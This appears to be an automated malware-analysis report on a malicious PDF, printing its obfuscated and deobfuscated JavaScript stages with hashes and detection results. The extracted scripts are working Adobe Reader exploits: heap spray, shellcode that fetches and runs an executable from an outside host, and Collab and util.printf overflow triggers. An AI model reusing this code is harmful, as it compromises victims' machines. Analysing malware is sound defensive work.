U3MSU2NyUzNiU3NCU0ZiUyMCUyZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUyOSUyMCUyZiUyMCU1YSU3OCU0MyU2NSU0ZSU3MyU2NiU0NiU1NyUzYiUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3NiU2MSU3MiUyMCU0OCU0NCU1MiU3OCU3MSU0MyU2OSU0MyU1MCUyMCUzZCUyMCUzMCUzYiUyMCU0OCU0NCU1MiU3OCU3MSU0MyU2OSU0MyU1MCUyMCUzYyUyMCU3MCU1OCU0NSU1YSU0NSU1YSU1OCU3MyU3MCUzYiUyMCU0OCU0NCU1MiU3OCU3MSU0MyU2OSU0MyU1MCUyYiUyYiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2ZSU0NyU0NSUzOSU1NSU1OSU2OSU0NyU0NSU1YiU0OCU0NCU1MiU3OCU3MSU0MyU2OSU0MyU1MCU1ZCUyMCUzZCUyMCU0YiUzNCU2MiU3YSU1NCU2ZiU0OSUzNiU0ZiUyMCUyYiUyMCU1MiU0OSU3MiU0OCUzMiU3OSU2ZCU0OSU2MiUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU0YyUzMiU2NCU1NSU0MiU0NyU0NyU2NCUzNSUyOCUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3YSU0MyUzNyU0OCUzOSU2MyU0NSUzOCU0MSUyMCUzZCUyMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZCUyMCU2MSU3MCU3MCUyZSU3NiU2OSU2NSU3NyU2NSU3MiU1NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyZSU3NCU2ZiU1MyU3NCU3MiU2OSU2ZSU2NyUyOCUyOSUzYiUyMCUyMCUyMCUyMCU2MSU3MCU3MCUyZSU2MyU2YyU2NSU2MSU3MiU1NCU2OSU2ZCU2NSU0ZiU3NSU3NCUyOCU2YyUzNyU3MCU3NiU0ZSU1NyU2ZSU1MCU0NiUyOSUzYiUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZSUzZCUyMCUzOCUyMCUyNiUyNiUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzMiUyOSUyMCU3YyU3YyUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzYyUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2NCUzMCU0YyU2ZSU3OCU0NyU0YSU3MCU0YiUyOCUzMCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2NiU3MCUzNiU1MSU0YyU3MSU1NyU2MiU2MiUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzMCU2MyUzMCU2MyUyNSU3NSUzMCU2MyUzMCU2MyUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU2NiU3MCUzNiU1MSU0YyU3MSU1NyU2MiU2MiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzNCUzNCUzOSUzNSUzMiUyOSUyMCU2NiU3MCUzNiU1MSU0YyU3MSU1NyU2MiU2MiUyMCUyYiUzZCUyMCU2NiU3MCUzNiU1MSU0YyU3MSU1NyU2MiU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YiU1MSUzOSU1MCU2NSU3MSU0NCU0YSU0NiUyMCUzZCUyMCU3NCU2OCU2OSU3MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MSU2NCU2ZCU2OCU3OSUzNiU1NCUzMyU0ZiUyMCUzZCUyMCU0MyU2ZiU2YyU2YyU2MSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCU2YiU1MSUzOSU1MCU2NSU3MSU0NCU0YSU0NiU1YiUyMiU2MyU2ZiU2YyU2YyU2MSU2MiU1MyU3NCU2ZiU3MiU2NSUyMiU1ZCUyMCUzZCUyMCU1MSU2NCU2ZCU2OCU3OSUzNiU1NCUzMyU0ZiU1YiUyMiU2MyU2ZiU2YyU2YyU2NSU2MyU3NCU0NSU2ZCU2MSU2OSU2YyU0OSU2ZSU2NiU2ZiUyMiU1ZCUyOCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MyU3NSU2MiU2YSUyMCUzYSUyMCUyMiUyMiUyYyUyMCU2ZCU3MyU2NyUyMCUzYSUyMCU2NiU3MCUzNiU1MSU0YyU3MSU1NyU2MiU2MiUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZSUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCUyNiUyNiUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzNCUyOSUyMCU3YyU3YyUyMCUyOCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZSUzZCUyMCUzOSUyMCUyNiUyNiUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzYyUyMCUzOSUyZSUzMSUyOSUyMCU3YyU3YyUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzYyUzZCUyMCUzNyUyZSUzMSUzMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NCU3MiU3OSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU2MSU3MCU3MCUyZSU2NCU2ZiU2MyUyZSU0MyU2ZiU2YyU2YyU2MSU2MiUyZSU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NCUzMCU0YyU2ZSU3OCU0NyU0YSU3MCU0YiUyOCUzMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSUzMCUzOSUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzMCU3OCUzNCUzMCUzMCUzMCUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUyMCUyYiUzZCUyMCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUyMCUzZCUyMCUyMiU0ZSUyZSUyMiUyMCUyYiUyMCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiU3OSU1NiU2MSU0MiU0ZSU0NCUzNSU1MyUyMCUzZCUyMCU2MSU3MCU3MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0MiU3OSU1NiU2MSU0MiU0ZSU0NCUzNSU1MyU1YiUyMiU2NCU2ZiU2MyUyMiU1ZCU1YiUyMiU0MyU2ZiU2YyU2YyU2MSU2MiUyMiU1ZCU1YiUyMiU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyMiU1ZCUyOCU2YSU0MyU2NSU3NCU3NSUzOSU2ZSU2MSU1MCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YSU0MyUzNyU0OCUzOSU2MyU0NSUzOCU0MSUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YSU0MyUzNyU0OCUzOSU2MyU0NSUzOCU0MSUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2MyU2MSU3NCU2MyU2OCUyOCU2NSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YSU0MyUzNyU0OCUzOSU2MyU0NSUzOCU0MSUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU3YSU0MyUzNyU0OCUzOSU2MyU0NSUzOCU0MSUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZCUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCU3YyU3YyUyMCU2NiU0NiU1OSU2NyU1NCU2YSU2YyU2YiU0YSUyMCUzZCUzZCUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NCUzMCU0YyU2ZSU3OCU0NyU0YSU3MCU0YiUyOCUzMSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NiU0ZiUzOCU0NiU0OSU0ZiU0NyU3MiU1MyUyMCUzZCUyMCUyMiUzMSUzMiUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3MCUzMiU0MiUzOCU2YSU2MyU0OCU0OCU0NyUyMCUzZCUyMCUzMCUzYiUyMCU3MCUzMiU0MiUzOCU2YSU2MyU0OCU0OCU0NyUyMCUzYyUyMCUzMiUzNyUzNiUzYiUyMCU3MCUzMiU0MiUzOCU2YSU2MyU0OCU0OCU0NyUyYiUyYiUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU0ZiUzOCU0NiU0OSU0ZiU0NyU3MiU1MyUyMCUyYiUzZCUyMCUyMiUzOCUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NyUzMyU1OSU0ZCU1MCU3MCU1NyUzNiU2ZSUyMCUzZCUyMCU3NSU3NCU2OSU2YyUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyUzMyU1OSU0ZCU1MCU3MCU1NyUzNiU2ZSU1YiUyMiU3MCU3MiU2OSU2ZSU3NCU2NiUyMiU1ZCUyOCUyMiUyNSUzNCUzNSUzMCUzMCUzMCU2NiUyMiUyYyUyMCU3NiU0ZiUzOCU0NiU0OSU0ZiU0NyU3MiU1MyUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3ZCUyMCU3ZCUyMCIpKTsgCiBhcHAuRDJ0c09XNlVqID0gTDJkVUJHR2Q1OwogbDdwdk5XblBGID0gYXBwLnNldFRpbWVPdXQoImFwcC5EMnRzT1c2VWooKSIsIDEpOwo=");
var sssddd = eval;
sssddd(aasd);
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 | 5026 bytes |
SHA-256: ac6c9ca417d8eaba8f09d39259d5c289c3685a5d85e1f3e501a10e22eba7da0b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var nGE9UYiGE = new Array();
var l7pvNWnPF;
var lave = eval;
lave(unescape(" function UsJPanWOm(K4bzToI6O, B8gySI5bK) { while(K4bzToI6O.length * 2 < B8gySI5bK) { K4bzToI6O += K4bzToI6O; } K4bzToI6O = K4bzToI6O.substring(0, B8gySI5bK / 2); return K4bzToI6O; } ")); lave(unescape(" function d0LnxGJpK(DswL7i0dY) { if(DswL7i0dY == 0) { var DLiAqg6tO = 0x0c0c0c0c; var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(DswL7i0dY == 1) { DLiAqg6tO = 0x30303030; var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(DswL7i0dY == 2) { var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var ZxCeNsfFW = 0x400000; var LESnBtpnS = RIrH2ymIb.length * 2; var B8gySI5bK = ZxCeNsfFW - (LESnBtpnS + 0x38); var K4bzToI6O = unescape("%u9090%u9090"); K4bzToI6O = UsJPanWOm(K4bzToI6O, B8gySI5bK); var pXEZEZXsp = (DLiAqg6tO - 0x400000) / ZxCeNsfFW; for(var HDRxqCiCP = 0; HDRxqCiCP < pXEZEZXsp; HDRxqCiCP++) { nGE9UYiGE[HDRxqCiCP] = K4bzToI6O + RIrH2ymIb; } } ")); lave(unescape(" function L2dUBGGd5() { var zC7H9cE8A = 0; var fFYgTjlkJ = app.viewerVersion.toString(); app.clearTimeOut(l7pvNWnPF); if((fFYgTjlkJ >= 8 && fFYgTjlkJ < 8.102) || fFYgTjlkJ < 7.1) { d0LnxGJpK(0); var fp6QLqWbb = unescape("%u0c0c%u0c0c"); while(fp6QLqWbb.length < 44952) fp6QLqWbb += fp6QLqWbb; var kQ9PeqDJF = this; var Qdmhy6T3O = Collab; kQ9PeqDJF["collabStore"] = Qdmhy6T3O["collectEmailInfo"]( { subj : "", msg : fp6QLqWbb } ); } if((fFYgTjlkJ >= 8.102 && fFYgTjlkJ < 8.104) || (fFYgTjlkJ >= 9 && fFYgTjlkJ < 9.1) || fFYgTjlkJ <= 7.101) { try { if(app.doc.Collab.getIcon) { d0LnxGJpK(2); var jCetu9naP = unescape("%09"); while(jCetu9naP.length < 0x4000) { jCetu9naP += jCetu9naP; } jCetu9naP = "N." + jCetu9naP; var ByVaBND5S = app; ByVaBND5S["doc"]["Collab"]["getIcon"](jCetu9naP); zC7H9cE8A = 1; } else { zC7H9cE8A = 1; } } catch(e) { zC7H9cE8A = 1; } if(zC7H9cE8A == 1) { if(fFYgTjlkJ == 8.102 || fFYgTjlkJ == 7.1) { d0LnxGJpK(1); var vO8FIOGrS = "12999999999999999999"; for(p2B8jcHHG = 0; p2B8jcHHG < 276; p2B8jcHHG++) { vO8FIOGrS += "8"; } var w3YMPpW6n = util; w3YMPpW6n["printf"]("%45000f", vO8FIOGrS); } } } } "));
app.D2tsOW6Uj = L2dUBGGd5;
l7pvNWnPF = app.setTimeOut("app.D2tsOW6Uj()", 1);
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6 | 5022 bytes |
SHA-256: c989df71814018041564039cda1491b459feecaebbcec1c971387a99c6801e20 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var nGE9UYiGE = new Array();
var l7pvNWnPF;
var lave = eval;
lave(unescape(" function UsJPanWOm(K4bzToI6O, B8gySI5bK) { while(K4bzToI6O.length * 2 < B8gySI5bK) { K4bzToI6O += K4bzToI6O; } K4bzToI6O = K4bzToI6O.substring(0, B8gySI5bK / 2); return K4bzToI6O; } ")); lave(unescape(" function d0LnxGJpK(DswL7i0dY) { if(DswL7i0dY == 0) { var DLiAqg6tO = 0x0c0c0c0c; var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(DswL7i0dY == 1) { DLiAqg6tO = 0x30303030; var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(DswL7i0dY == 2) { var RIrH2ymIb = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var ZxCeNsfFW = 0x400000; var LESnBtpnS = RIrH2ymIb.length * 2; var B8gySI5bK = ZxCeNsfFW - (LESnBtpnS + 0x38); var K4bzToI6O = unescape("%u9090%u9090"); K4bzToI6O = UsJPanWOm(K4bzToI6O, B8gySI5bK); var pXEZEZXsp = (DLiAqg6tO - 0x400000) / ZxCeNsfFW; for(var HDRxqCiCP = 0; HDRxqCiCP < pXEZEZXsp; HDRxqCiCP++) { nGE9UYiGE[HDRxqCiCP] = K4bzToI6O + RIrH2ymIb; } } ")); lave(unescape(" function L2dUBGGd5() { var zC7H9cE8A = 0; var fFYgTjlkJ = app.viewerVersion.toString(); app.clearTimeOut(l7pvNWnPF); if((fFYgTjlkJ >= 8 && fFYgTjlkJ < 8.102) || fFYgTjlkJ < 7.1) { d0LnxGJpK(0); var fp6QLqWbb = unescape("%u0c0c%u0c0c"); while(fp6QLqWbb.length < 44952) fp6QLqWbb += fp6QLqWbb; var kQ9PeqDJF = this; var Qdmhy6T3O = Collab; kQ9PeqDJF["collabStore"] = Qdmhy6T3O["collectEmailInfo"]( { subj : "", msg : fp6QLqWbb } ); } if((fFYgTjlkJ >= 8.102 && fFYgTjlkJ < 8.104) || (fFYgTjlkJ >= 9 && fFYgTjlkJ < 9.1) || fFYgTjlkJ <= 7.101) { try { if(app.doc.Collab.getIcon) { d0LnxGJpK(2); var jCetu9naP = unescape(" "); while(jCetu9naP.length < 0x4000) { jCetu9naP += jCetu9naP; } jCetu9naP = "N." + jCetu9naP; var ByVaBND5S = app; ByVaBND5S["doc"]["Collab"]["getIcon"](jCetu9naP); zC7H9cE8A = 1; } else { zC7H9cE8A = 1; } } catch(e) { zC7H9cE8A = 1; } if(zC7H9cE8A == 1) { if(fFYgTjlkJ == 8.102 || fFYgTjlkJ == 7.1) { d0LnxGJpK(1); var vO8FIOGrS = "12999999999999999999"; for(p2B8jcHHG = 0; p2B8jcHHG < 276; p2B8jcHHG++) { vO8FIOGrS += "8"; } var w3YMPpW6n = util; w3YMPpW6n["printf"]("E000f", vO8FIOGrS); } } } } "));
app.D2tsOW6Uj = L2dUBGGd5;
l7pvNWnPF = app.setTimeOut("app.D2tsOW6Uj()", 1);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.